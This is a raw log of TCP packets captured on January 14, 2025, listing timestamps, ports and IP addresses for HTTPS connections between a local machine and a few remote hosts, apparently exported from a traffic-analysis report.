                                                                                                                                                                                                  Jan 14, 2025 23:37:52.073729038 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.077492952 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.077605009 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.077801943 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.119369984 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.127079010 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220149040 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220266104 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220331907 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220355034 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220383883 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220431089 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220467091 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220618963 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220679998 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220710993 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220830917 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220880032 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.220894098 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.224735022 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.224807024 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.224818945 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.224842072 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.224886894 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.224917889 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.231913090 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.231980085 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.232451916 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.232469082 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.232558012 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.232578039 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.232861996 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.233917952 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.233990908 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.234612942 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.234689951 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.239958048 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.240206957 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.241707087 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.241744995 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.241786003 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.241871119 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.241885900 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.267101049 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.282953978 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308293104 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308358908 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308378935 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308445930 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308509111 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308538914 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308532953 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308533907 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308564901 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308603048 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308660030 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.308660030 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.309257984 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.309300900 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.309324980 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.309341908 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.309353113 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.309370041 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.309406996 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310211897 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310233116 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310266972 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310280085 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310312033 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310328960 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310343027 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310399055 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.310412884 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.311120033 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.311140060 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.311176062 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.311191082 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.311245918 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.374121904 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.374231100 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.374407053 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.374494076 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.374641895 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.374655962 CET4434972135.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.374677896 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.374701977 CET49721443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.375224113 CET49723443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.375241995 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.375303984 CET49723443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.375590086 CET49723443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.375596046 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.376980066 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.396784067 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.396814108 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.396981001 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.396984100 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397063017 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397111893 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397111893 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397196054 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397459984 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397511005 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397530079 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397587061 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397600889 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.397675991 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.398205996 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.398277998 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.398348093 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.398348093 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.398365021 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.398426056 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.399102926 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.399173975 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.399180889 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.399190903 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.399228096 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.399250031 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400033951 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400069952 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400091887 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400105000 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400129080 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400132895 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400157928 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400168896 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400201082 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400939941 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.400994062 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.401009083 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.401065111 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.401068926 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.401078939 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.401130915 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.401846886 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.402039051 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.457825899 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.457937956 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.457995892 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458019972 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458096981 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458138943 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458147049 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458240032 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458283901 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458288908 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458723068 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458771944 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.458780050 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.462461948 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.462492943 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.462522030 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.462534904 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.462611914 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.462661982 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.462667942 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.462713957 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.485522985 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.485634089 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.485723972 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.485723972 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.485862017 CET49719443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.485904932 CET44349719104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.504004955 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548036098 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548084974 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548129082 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548147917 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548196077 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548454046 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548502922 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548521996 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548537970 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548547029 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.548577070 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549084902 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549134016 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549156904 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549164057 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549170971 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549200058 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549204111 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549238920 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549793005 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549839020 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549870014 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549874067 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549880981 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549905062 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549911022 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549915075 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.549951077 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.550668001 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.550718069 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.550743103 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.550756931 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.550764084 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.550796032 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.638669014 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.638726950 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.638751984 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.638773918 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.638792992 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.638833046 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639022112 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639136076 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639179945 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639187098 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639220953 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639506102 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639588118 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639594078 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639650106 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639659882 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639708042 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639750004 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.639800072 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.640562057 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.640629053 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.640657902 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.640703917 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.640736103 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.640793085 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.641350985 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.641416073 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.641470909 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.641520977 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.641555071 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.641597033 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.642273903 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.642334938 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.642399073 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.642446041 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.642486095 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.642529964 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.726916075 CET4968980192.168.2.16192.229.211.108
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729459047 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729533911 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729573011 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729625940 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729688883 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729738951 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729790926 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729844093 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729891062 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729952097 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.729980946 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730026007 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730328083 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730390072 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730411053 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730479956 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730490923 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730546951 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730711937 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730761051 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730803013 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730844021 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730850935 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730974913 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.730992079 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.731054068 CET44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.731076002 CET49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.733819008 CET49727443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.733913898 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.734010935 CET49727443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.734215021 CET49727443192.168.2.16104.18.94.41
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.734236956 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.839040041 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.839354992 CET49723443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.839364052 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.839711905 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.840106964 CET49723443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.840156078 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.840379953 CET49723443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.883327007 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.969650030 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.969706059 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.969748974 CET49723443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.969892979 CET49723443192.168.2.1635.190.80.1
                                                                                                                                                                                                  Jan 14, 2025 23:37:52.969904900 CET4434972335.190.80.1192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.193882942 CET44349727104.18.94.41192.168.2.16
                                                                                                                                                                                                  Jan 14, 2025 23:37:53.194294930 CET49727443192.168.2.16104.18.94.41
